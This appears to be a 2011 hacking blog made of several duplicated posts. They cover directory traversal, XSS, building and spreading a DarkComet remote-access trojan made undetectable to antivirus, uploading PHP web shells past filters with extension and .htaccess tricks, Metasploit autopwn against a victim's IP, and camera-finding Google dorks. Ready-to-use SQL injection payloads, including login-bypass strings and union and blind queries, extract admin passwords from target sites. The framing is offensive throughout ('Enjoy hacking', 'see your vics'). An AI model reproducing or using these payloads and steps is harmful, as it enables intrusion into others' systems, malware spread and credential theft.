Hi Friends first of all let me tell u What is Directory Transversal
Directory Transversal allows you to change what directory you are located in by typing in the URL bar. This allows you to access pages you normally can't on an insecure webpage.
Now what is robots.txt-
"Web site owners use the /robots.txt file to give instructions about their site to web robots; this is called The Robots Exclusion Protocol."
It works likes this: a robot wants to vists a Web site URL, say http://www.example.com/welcome.html. Before it does so, it firsts checks for http://www.example.com/robots.txt, and finds:
User-agent: *
Disallow: /
The "User-agent: *" means this section applies to all robots. The "Disallow: /" tells the robot that it should not visit any pages on the site.
==>Now next step is Finding disallowed pages
This is quite simple. Go to the main page and type in:
Http://www.[hostname].ext/robots.txt
In this textfile, you will see something that looks like this:
User-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
>>User-Agent can be something else then* this means all. This can be a type of webbrowser. That would block the user agent.
Now our last step is to access pages since we can traverse those directories which are allowed but what about those which are disallowed for traversal. here we can try a trick that may help you to get into the restricted directory:
Type a directory that comes after CODE:
Disallow:
Chances are, you will get denied.
To get access you could see if you can mod your cookie, but that's not what I'm talking about.
Now type in the same directory as before, but add /Anyrandomletters&symbols
It should look like this:
[host]/disalloweddirectory/Anyrandomletters&symbols
This will give you an error saying not found. Good.
Now for the Directory Transversal part:
[host]/disalloweddirectory/anyrandomletters&symbols/../
You should have noticed the /../ That is the Directory Transversal part.
What this does is send you back one directory, and if the website is insecure, then you can get access to the Disallowed area.
This doesn't work with just about every popular site, but works with privately owned sites which are nor properly coded.
Thnx :-) Enjoy hacking :-)
Tuesday, November 8, 2011
Thursday, November 3, 2011
XSS Attack (Cross Site Scripting)
Hello Friends, Today i am sharing about the most common vulnerability which is generally found in most of websites because of poor coding. First f all let me tell you what XSS is.
WHAT IS XSS: reference wikipedia -
"Cross-zone scripting is a browser exploit taking advantage of a vulnerability within a zone-based security solution. The attack allows content (scripts) in unprivileged zones to be executed with the permissions of a privileged zone - i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:
* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.
* a web browser configuration error; unsafe sites listed in privileged zones.
* a cross-site scripting vulnerability within a privileged zone
A common attack scenario involves two steps.
The first step is to use a Cross Zone Scripting vulnerability
to get scripts executed within a privileged zone. To complete the attack,
then perform malicious actions on the computer using insecure ActiveX components.
This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page."
Second step is to code a XSS vulnerable page so here we go:
open notepad and copy content from links given below
save this page as index.html => http://pastebin.com/Y6pN08pv
save this page as: XSS.php => http://pastebin.com/L0E4bJKc
open index.html in firefox
enter a value and search ,return on the page of search and enter
send the form
Above was just a simple "non persistent XSS" ,However a XSS attack can lead to serious problems such as cookie stealing,privacy disclosure,defacing etc. You can code a cookie grabber and then u can redirect your victim to that script. Persistent XSS allows attacker to change the content of site means data so the website will look normal as all the links are given by the pwner of the site hence the victims will easily trust and may follow evil's link :P
now next step is to secure XSS:
simply use
use htmlspecialchars() function in PHP or use other function: htmlentities() :-)
code ==> http://pastebin.com/Cc4quJVB
In next post i'll write about How to bypass filter to get XSS on site and will share many more tricks that can be played in XSS vulnerable site ;-)
Happy hacking at your own risk :)
WHAT IS XSS: reference wikipedia -
"Cross-zone scripting is a browser exploit taking advantage of a vulnerability within a zone-based security solution. The attack allows content (scripts) in unprivileged zones to be executed with the permissions of a privileged zone - i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:
* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.
* a web browser configuration error; unsafe sites listed in privileged zones.
* a cross-site scripting vulnerability within a privileged zone
A common attack scenario involves two steps.
The first step is to use a Cross Zone Scripting vulnerability
to get scripts executed within a privileged zone. To complete the attack,
then perform malicious actions on the computer using insecure ActiveX components.
This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page."
Second step is to code a XSS vulnerable page so here we go:
open notepad and copy content from links given below
save this page as index.html => http://pastebin.com/Y6pN08pv
save this page as: XSS.php => http://pastebin.com/L0E4bJKc
open index.html in firefox
enter a value and search ,return on the page of search and enter
send the form
Above was just a simple "non persistent XSS" ,However a XSS attack can lead to serious problems such as cookie stealing,privacy disclosure,defacing etc. You can code a cookie grabber and then u can redirect your victim to that script. Persistent XSS allows attacker to change the content of site means data so the website will look normal as all the links are given by the pwner of the site hence the victims will easily trust and may follow evil's link :P
now next step is to secure XSS:
simply use
use htmlspecialchars() function in PHP or use other function: htmlentities() :-)
code ==> http://pastebin.com/Cc4quJVB
In next post i'll write about How to bypass filter to get XSS on site and will share many more tricks that can be played in XSS vulnerable site ;-)
Happy hacking at your own risk :)
Monday, October 10, 2011
Earn money online
Hey frnds this is just a post apart from hacking, Those who want to make some money online please register urself and start earning.its easy and real.
Sunday, July 3, 2011
Hack a PC Using RAT(Remote administration tool)
Hello Friends ...Sorry i am writing after a long time coz i was busy in some stuffs. Here today i will tell you how to hack a pc using DARK COMET RAT. This tutorial is so easy to start...
First go to http://www.no-ip.com/ and create an account. Then
: Choose your host name.
: Your ip address
: Create host.
As shown below in the pic :
No-Ip is set ,now lets download the DUC to update your ip automatically!
DUC download : http://www.no-ip.com/downloads.php
Start the DUC client after installation.
Now to download DarkComet , you can visit http://www.darkcomet-rat.com/ to find some info and download.
After installation ,open DarkComet client. If you don't want to use the DUC client for No-IP you can do it with DarkComet. Here is how to do it :
Now lets build the server ,go to Edit Server => Server Module.
Press Generate few times
1 : Enter your no-ip host name
2 : Choose your port
3 : Test Network
4 : Add this to your configuration
5 : Click your host to set it.
again if u want key logs then :
Now its time to build your server!
And you are done...wooo000hhH
This was all about use of RAT but u need to crypt your server to make it undetectable from anti viruses.. so have fun and enjoy hacking at your own risk....good luck.
: Choose your host name.
: Your ip address
: Create host.
As shown below in the pic :
now
No-Ip is set ,now lets download the DUC to update your ip automatically!
DUC download : http://www.no-ip.com/downloads.php
Start the DUC client after installation.
Now to download DarkComet , you can visit http://www.darkcomet-rat.com/ to find some info and download.
After installation ,open DarkComet client. If you don't want to use the DUC client for No-IP you can do it with DarkComet. Here is how to do it :
Now lets build the server ,go to Edit Server => Server Module.
Press Generate few times
1 : Enter your no-ip host name
2 : Choose your port
3 : Test Network
4 : Add this to your configuration
5 : Click your host to set it.
Make sure your port is open! You can check it here http://canyouseeme.org/
Next step you can choose but this is what i use ,if you don't know what to do just copy the settings
Next step you can choose but this is what i use ,if you don't know what to do just copy the settings
note :: After building you need to crypt your server to get it FUD for spreading!
Now to see your vics ,press +listen ,set your port and press listen!
Now to see your vics ,press +listen ,set your port and press listen!
And you are done...wooo000hhH
This was all about use of RAT but u need to crypt your server to make it undetectable from anti viruses.. so have fun and enjoy hacking at your own risk....good luck.
Friday, April 8, 2011
Uploading a SHELL
Hello friends!!!
I have not written this article despite i am sharing this because i think it will be helpful to those who upload their shells on target but it does not execute.
NOTE: I am not responsible for what you do with this information.
How to Upload a Shell
First of all, when uploading a shell, you MUST be able to problem solve. Some of the techniques I have compiled in this guide aren't exactly easy for most of you.
I am separating this guide into steps, and sometimes, this won't always work. In fact, most of the time (If the coder was that bright at all), these techniques will NOT work. So don't go posting away about it not working for you on one site..
First though, you need some form of upload script. I don't care if it's a public upload script, or one off an admin page.
Step 1
First off, try the shell with the regular php extension. I've seen this work for admin panels a lot of the time, because the coder doesn't think anyone but the site admin will be messing with it.. He doesn't stop to think about security.
Step 2
If step 1 doesn't work, you're going to have to try different extensions that also execute php on most servers. These would include .php2, .php3, .php4, .php5, .phtml, .htm (rare cases), .html (rare cases), and no extension at all (rare cases). Also, you can attempt using a null to make it work.
Examples:
Code:
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%:
shell.php.jpg;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
Step 3
Now on to step 3, it seems that step 2 didn't work for you. Sometimes, (now this is occasional), the file extensions it will accept are in the source of the page itself.. this is most common for java uploaders and similar. So to check for this, obviously view the source of the page and check it over for anything that looks like file extensions. If you do find any, you are going to want to use a tool like Firebug (Addon for Firefox), to edit the source to include the extension "php".
Step 4
Next, maybe the script is just blocking the .php, .php2, .php3, ect. scripts from being uploaded. The best way to counter-act this is to upload a .htaccess file. Go into notepad or w/e and paste this in:
Code:
AddType application/x-httpd-php .shell .other .jpg .gif .png .mov .pdf
Then upload the shell with one of those extensions. It should execute as php even with the wierd extension.
Step 5
Last but not least, is the header modification trick. This one is a little complicated (Will add pics in a min..) To do this, you need something like the Tamper Data addon for Firefox. In this example, I'll use that addon. What you want to do is after you attempt to send the post data, tamper the data before it sends. Then you will want to scroll through the raw data until you find the header data.. let's say our header is Application/Data... you would want to change that to something appropriate to the scripts intended purpose, like Image/Jpeg for an image upload script.
That concludes a guide for how to upload a shell for now, will add more to it later, enjoy!
happy hacking :))
I have not written this article despite i am sharing this because i think it will be helpful to those who upload their shells on target but it does not execute.
NOTE: I am not responsible for what you do with this information.
How to Upload a Shell
First of all, when uploading a shell, you MUST be able to problem solve. Some of the techniques I have compiled in this guide aren't exactly easy for most of you.
I am separating this guide into steps, and sometimes, this won't always work. In fact, most of the time (If the coder was that bright at all), these techniques will NOT work. So don't go posting away about it not working for you on one site..
First though, you need some form of upload script. I don't care if it's a public upload script, or one off an admin page.
Step 1
First off, try the shell with the regular php extension. I've seen this work for admin panels a lot of the time, because the coder doesn't think anyone but the site admin will be messing with it.. He doesn't stop to think about security.
Step 2
If step 1 doesn't work, you're going to have to try different extensions that also execute php on most servers. These would include .php2, .php3, .php4, .php5, .phtml, .htm (rare cases), .html (rare cases), and no extension at all (rare cases). Also, you can attempt using a null to make it work.
Examples:
Code:
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%:
shell.php.jpg;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
Step 3
Now on to step 3, it seems that step 2 didn't work for you. Sometimes, (now this is occasional), the file extensions it will accept are in the source of the page itself.. this is most common for java uploaders and similar. So to check for this, obviously view the source of the page and check it over for anything that looks like file extensions. If you do find any, you are going to want to use a tool like Firebug (Addon for Firefox), to edit the source to include the extension "php".
Step 4
Next, maybe the script is just blocking the .php, .php2, .php3, ect. scripts from being uploaded. The best way to counter-act this is to upload a .htaccess file. Go into notepad or w/e and paste this in:
Code:
AddType application/x-httpd-php .shell .other .jpg .gif .png .mov .pdf
Then upload the shell with one of those extensions. It should execute as php even with the wierd extension.
Step 5
Last but not least, is the header modification trick. This one is a little complicated (Will add pics in a min..) To do this, you need something like the Tamper Data addon for Firefox. In this example, I'll use that addon. What you want to do is after you attempt to send the post data, tamper the data before it sends. Then you will want to scroll through the raw data until you find the header data.. let's say our header is Application/Data... you would want to change that to something appropriate to the scripts intended purpose, like Image/Jpeg for an image upload script.
That concludes a guide for how to upload a shell for now, will add more to it later, enjoy!
happy hacking :))
Tuesday, April 5, 2011
Hacking a computer with metasploit
Hello friends today i am sharing how to use metasploit to exploit a remote computer.
Here we go :
NOTE : I am not responsible for what you do with this information.
Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.
Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.
Now launch msfconsole.
It'll take sometime as it has more than 600 exploits and 200 payloads.
Type = db_driver sqlite3
=>> It'll enable the database driver.
Now type = db_create
=>> It'll create a database.
Type = nmap
=>> It'll load the Nmap up.
Now type = db_nmap -sT -sV [victim's ip address]
=>> It'll show the open ports of victim's machine.
Now finally type = db_autopwn -p -t -e
=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!
Now you have full access to that PC you can do anything with this PC.
Enjoy hacking
Here we go :
NOTE : I am not responsible for what you do with this information.
Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.
Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.
Now launch msfconsole.
It'll take sometime as it has more than 600 exploits and 200 payloads.
Type = db_driver sqlite3
=>> It'll enable the database driver.
Now type = db_create
=>> It'll create a database.
Type = nmap
=>> It'll load the Nmap up.
Now type = db_nmap -sT -sV [victim's ip address]
=>> It'll show the open ports of victim's machine.
Now finally type = db_autopwn -p -t -e
=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!
Now you have full access to that PC you can do anything with this PC.
Enjoy hacking
Thursday, March 31, 2011
Watch Hidden Cameras all over the world
Hello everyone, its not hacking its just about whether you know this or not :P. I am sharing this with you because i thought you may love to see through public camera's of different countries :).
Type these dorks on www.google.com and get loads of hidden cameras of various cities / college campuses,roads n even sea beaches from all around the world.
Dorks :
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210?
inurl:indexFrame.shtml Axis
enjoy :))
Type these dorks on www.google.com and get loads of hidden cameras of various cities / college campuses,roads n even sea beaches from all around the world.
Dorks :
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210?
inurl:indexFrame.shtml Axis
enjoy :))
Wednesday, March 2, 2011
playing with SSH (Secure Shell)
Hiii guys here i am writing about one of the most basic and popular method for remote administratotion. Here i will try to provide as much information i can.
SSH : (Secure Shell) : It is used to access or log in to a remote machine on the network,using its host name or IP address. Its a secure network data exchange protocol which came up as an enhancement of insecure potocols like telnet ,rsh,etc. SSH encrypts the bi-directional data transfers using cryptographic algorithms and hence it is away from data theft and sniffing.
Here we go with basic functions of SSH Protocol :
> Compression
>Public Key Authentication
>Port Forwarding
>Tunneling
>X11 Forwarding
>File Transfer
It seems to be a complete package for remote administration.
To install SSH Package in Linux based systems , here I am writing command for some distros
1> Debian :
# apt-get install openssh-server
# apt-get install openssh-client
2> Ubuntu
# sudo apt-get install openssh-server
# sudo apt-get install openssh-client
3> RHEL
# rpm -ivh openssh-server
# rpm -ivh openssh-client
4> fedora
# yum install openssh-server
# yum install openssh-client
now i guess you can install both the packages on your machine by issuing respective installation command. In case of windows OS , It does not support SSH as default protocol so we need to use third party agent like puTTy , "Ssh tunnel easy" or any other software. Now lets proceed to see working of ssh protocol. :)
>>>Basic Operations:
1> Remote login
root@sanju]# ssh user@hostname /* we can provide IP address of server in place of hostname
OR
root@sanju]# ssh hostname (this command is equal to ]# ssh root@hostname because we are trying to login from root of our machine to root of remote machine)
It might be possible you may not get connection even after ssh daemon is running on remote machine because system admin has configured SSH daemon to listen to anon-standard port such as 459 instead of 22. In this case you can issue a command to connect via desired port i.e.
root@sanju~]# ssh -p 459 hostname
After all above commands you will be prompted for password and after having proper credential you can access remote machine.
>>> Executing remote commands
Now Lets have some fun :
root@sanju~]# ssh remote-ip 'command'
e.g.
root@sanju~]# ssh hostname 'uname -a' (It will show kernel version and information about OS)
You can also fire this command to host >>> root@sanju~]# ssh user@hostname 'reboot' :P
>>> Input/Output redirection
First let's have a look to these command
echo "hackersgallery" demofile
cat < demofile equivqlent to "cat demofile"
i guess you can easily get what above command is doing. In first command string "hackersgallery" is directed to a file named "demofile" . In second command file "demofile" is directed to "cat" command.
Now move further :
echo hello|command1|command2
here "|" is pipe operator. It uses output of one command as Input to the another command. We can use any number of pipe serially e.g.
root@sanju]# echo "hackersgallery" | tr -d 'l'
output will be > hackersgaery
you can try out some more clubbbing of operators to get interesting results :
root@sanju]# ssh user@remotehost 'cat /etc/passwd | grep root'
SSH protocol also supports data transfer with compression
root@sanju~]# ssh -C user@remotehost
>>> File Transfer
Two data transfer utilities that will help you are SCP and SFTP. SCP stands for secure copy, We can use it to copy data from local machine to remote machine , remote machine to local machine or remote machine to remote machine.
>> local machine to remote machine
scp local_file_path user@remotehost::destination_file_path
>> remote machine to local machine
scp user@remotehost : remote_file_path local_destination_file_path
>> remote machine to remote machine
scp user1@remotehost1 user@remotehost2
We can even use wildcards to select file if we dont know exact name of file we want to get
scp :/home/*.txt /home/sanju/
SFTP stands for secure file transfer protocol.It is secure implementation of of the traditional FTP protocol . we can issue a command as
sftp user@remotehost (after entering password we'll enter sftp prompt)
sftp>
some of the commands that are available under sftp are:
>cd - to change directory on remote machine
>ls - to list remote directory content
>lcd - to change directory on local machine
>lls - to list local directory content
>put - to send or upload files to remote machine from current working directory of local machine
>get - to recieve or download files from remote machine to current working directory of local machine
RUNNING X-WINDOWS REMOTELY
To enable X11 Forwarding , edit ssh_config file
root@sanju~]# vi /etc/ssh/ssh_config
ForwardX11 yes
save and exit
Now to launch GUI apps remotely execute ssh command with X-option. e.g.
root@sanju~]# ssh -X root@remotehost 'vlc'
PORT FORWARDING
One of the important use of SSH is port forwarding, SSH allows you to forward port from client to server and server to client. There are two types of port forwarding Local and Remote. In local port forwarding ports from the client are forwarded to server ports ,Thus the locally forwarded port will act as the proxy port for port on the remote machine.
Local port forwarding
root@sanju~]# ssh -L local_port:remote_host:remote_port e.g.
ssh -L 2020:remotehost:20
here it forwards local port 2020 to remotehost's SSH port 22 , Thus we can use
ssh localhost -p 2020 instead of "ssh remotehost"
In remote port forwarding, ports from server are forwareded to a client port , Thus ports on the remote host will act as the proxy for ports on the local machine.
What is the use of remote forwarding?
Suppose you have local machine that lies inside an internal network connected to the Internet through a routeror gateway- If we want to access the local machine from outside the network , it is impossible to access it directly ,But by forwarding the local ports to a remote host,we can access the local machine through ports of remote host.
so our command will be
ssh -R remoteport :remotehost:localport e.g.
ssh -R 2020:remotehost.com:22
To SSH to the local machine from outside the internal network, we can make use of "remotehost.com " as
ssh remotehost.com:2020
SOCKS4 Proxy
SSH has an interesting feature called dynamic port forwarding with which the SSH TCP connection will work as SOCKS4 proxy.By Connecting to the given port,it handles SOCKS data transfer requests.
What is the use of dynamic port forwarding?
Lets suppose you have a machine on a network that is connected to the internet and you have another machine on the same network that does nothave ant internet connection. By using SSH Dynamic port forwarding you can easily access the internet by setting up the machine with an internet connection to act as the SOCKS4 proxy using SSH tunnel.
For dynamic port forwarding use following command:
ssh -D 3000 remotehost
now in your browser specify proxy setting as:
SOCKS4
hosts : localhost
port : 3000
to enable DNS service in firefox,navigate to about :config page and set
network.proxy.socks_remote_dns = true
There are many more things about SSH that are still to be learned . At last let us write a single shell script to reboot all the switched-on machines in the network.
#!/bin/bash
base_ip="192.168.0.";
for machine in $base_ip{1..255};
do
ping -c2 $machine &> /dev/null ;
if [$? -eq 0];
then
ssh $machine reboot ;
fi
done
<<==================================================>>
regards
sanjeev
Wednesday, February 16, 2011
SQL INJECTION IN DETAIL (Cont.)
Hello i am back with a good news that i got a job :) Lets continue with my previous article about SQL Injection
here i am explaining you about blind sqli . its a time taking injection because here you will have to guess many thing, it means that you shud have a good guessing power as well as luck :).
BLIND SQL INJECTION :-
I think here i need to write definition of blind injection. so i am copying it from wikipedia . here is the definition : http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_injection
Testing IF target is vulnerable to mysql blind :-
=> http://targetsite.com/news.php?id=5 and 1=1
^ as this is always true & page loads normally :))
=> http://test.com/news.php?id=5 and 1=2
^ this one is False :P So if some text, picture or some content is missing on returned page then that site is vulnerable to blind sql injection.
Getting Mysql version in blind sqli to get the version in blind attack we use substring i.e
=> http://targetsite.com/news.php?id=5 and substring(@@version,1,1)=4
^ this should return TRUE if the version of MySQL is 4.(replace 4 with 5, and if query return TRUE then the version is 5).
Now test if subselect works (when select don't work then we use subselect)
i.e
=> http://targetsite.com/news.php?id=5 and (select 1)=1
^ if page loads normally then subselects work.
Now, Let's see if we have access to => Mysql.user
=> http://targetsite.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can fetch some password using load_file() function and OUTFILE.
Check table and column names :-
# Guessing work starts that is,
=> http://targetsite.com/news.php?id=5 and (select 1 from users limit 0,1)=1
^(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row,this is very important, then if the page loads normally without content missing, the table users exits. If you get FALSE (OR some content missing), just change table name until you guess the right one :). Let's say that I have found that table name is users, now what we need is column name !! :D
# The same as table name, we start guessing.
=> http://targetsite.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
#if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)
Fetch data from database :-
I found table users i columns username password so I'm gonna pull characters from that.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here fetches the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with symbol greater then " >" . So if the ascii char greater then 80, the page loads normally. TRUE
>> keep trying until get false.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
# we get TRUE, keep incrementing
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, increment
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
got FALSE!!!
So the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.
=>> then let's check the second character.
# http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
# Note that i'hv changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
# FALSE, lower number.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
# TRUE, increment.
http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
# FALSE!!!
# we know that the second character is char(105) and that is 'i'. We have 'ci' so far
# so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end and we have got that data which we wanted from the table.
I know that this injection is really boring and tuff . So try hacking using this method atleast one site else there are many tools which helps u in blind SQLI , You can use them also.
Wait for my next article :)
sanjeev
Tuesday, February 8, 2011
SQL INJECTION IN DETAIL
Today i am posting this article after so many days because i was busy in placement like stuffs.
Hello guys My last post was on "prevention against SQLI" so i decided to write about SQL Injection attack :P .Here i will explain every thing briefly but make yourself sure that you wont use this information in wrong things As i don't take any responsibility of what you guys do with this information its all up to you :)
So lets start Today i will explain you about
1 STRING INJECTION : To bypass login forms authentication.
2 UNION SELECT
3 BLIND SQLI
4 ERROR BASED SQL INJECTION /* in mssql i have not tried this one but will post about this also*/
1. So Lets start with first one. This is so simple and even any one can try his/her hands in bypassing login forms security using this method.In this method first you have to search admin login page of the site you want to hack. You can find it using your intelligence or using some free available tools . Now after getting login
page all you have to do is just enter administrator's username and password and you are done.
Lets move on to second method.....hahahaha ......dont get angry...still we have to do some task after getting login page because we dont have admin's username and password.
Now if you are lucky enough then your target may be vulnurable to this attack . All you have to do it ,write following information in form
USERNAME : admin , administrator ,master ,manager ,targetsite_admin ,%admin% or you can try some general username in most of the cases these will work depending on your luck :P
PASSWORD : In password field use any of these strings.
' or 1=1--
" or 1=1--
or 1=1--
1'or'1'='1
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
Finally you are done. If your target is vulnerable you will get access for sure.
2. Union method :Now move towards some real work. In this you have to do everything manually by using your mind and skills , Lets start the job
>>> >>> >>>
Let's start with union Attack :
Our aim is to find TABLE NAME , COLUMN NAME and then username and password
=> http://targetsite.com/index.php?id=1 order by 10--
^ This gives me an error
keep trying
=> http://targetsite.com/index.php?id=1 order by 7--
^ again error arggg!!!! i hate it
keep trying
=> http://targetsite.com/index.php?id=1 order by 5--
the page is Loading normally.........woooooohh
It means, Number of columns = 5
Now the next part-
using union select statement.
=> http://targetsite.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't gives you anything, change the first part of the query to a negative value.
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on you screen. Lets say it is 2. Now we know that column 2 will echo data back to us. :D
Now getting Mysql version
=> http://targetsite.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you do not get with this try this-
=> http://targetsite.com/index.php?id=-1 union select 1,version()),3,4,5--
Now you will get get the version name
it can be-
==> 5+ /* version above 5*/
==>5> /*version below 5 */
Now Extracting table for version 5+ :
=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--
It'll show a lot of tables, if you want to get the admin privilege in order to hack the site then you are looking for "admin" table.
Now I got the Tables names & I need to extract the column names from them so the query will be-
=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--
This will show you the column names inside the table Admin. if it gives you an error you need to change the text value of admin to mysql char.Use hackbar, a Firefox addon to do so. OR use any other tool OR write it by your qwn if you know ascii value of every character.
so char of admin is =>CHAR(97, 100, 109, 105, 110)
therefore the query will be-
=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
It will show you many tables but we only need admin table and password table
=> http://targetsite.com/index.php?id=-1 union all select 1, group_concat (user_name,0x3a,user_password) ,3,4,5 from admin--
/*where 0x3a is the hex value of => : (colon) */
/*where 0x3a is the hex value of => : (colon) */
wooooohhh its tym to party you got the admin name and password
password can also be encrypted. So you can use decrypters to decode them .
This was all for Mysql 5+
=============================================================
=============================================================
Let's Start with mysql version below 5 :
Version 4 or below 5 does not contain any ==> Information_schema
This method is all about guessing :p
We know the number of columns that is 5.
=> Let's Start guessing the table:
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from users--
^ got error ...give one more try
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin--
^ Suppose this does not gives me error it means it worked and we got table name
==> Next part is Guessing the columns:
as we had done earlier & had found the vulnerable column is 2...so lets proceed further.
=> http://targetsite.com/index.php?id=-1 union all select 1,user,3,4,5 from admin--
^ got error. shit!!!!!!
=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from admin--
^ no error.....ya i got the column name
==> let's guess the password column now
=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin--
^ got an error one more try-
=> http://targetsite.com/index.php?id=-1 union all select 1,password,3,4,5 from admin--
We did it we got the password column successfuly so cheers
This is end of union method for mysql you can try the same for mssql. Wait for my next post i will post about Blind injection and error based both :)
Wednesday, February 2, 2011
Prevention against SQL Injection
Hello Friends these days i have hacked many sites using SQL Injection . So i thought about writing how to prevent our web page against this attack. There are many methods to prevent SQLI but i am writing few of them.
Lets say our code is
http://target.com/index.php?id=21
The above code is easily injectable and is enough for an attacker to enter your site without proper authentication.
But if we replace above code with the code written below then i guess we are 99.9% secure :P
Alternatively we can check $_GET['id'] for illegal and unwanted characters like this :
If we want we can use javascript to block and filter characters . This would be also useful to get rid of basic SQL string injection which is done at login forms.
I hope you like this post :=))
Lets say our code is
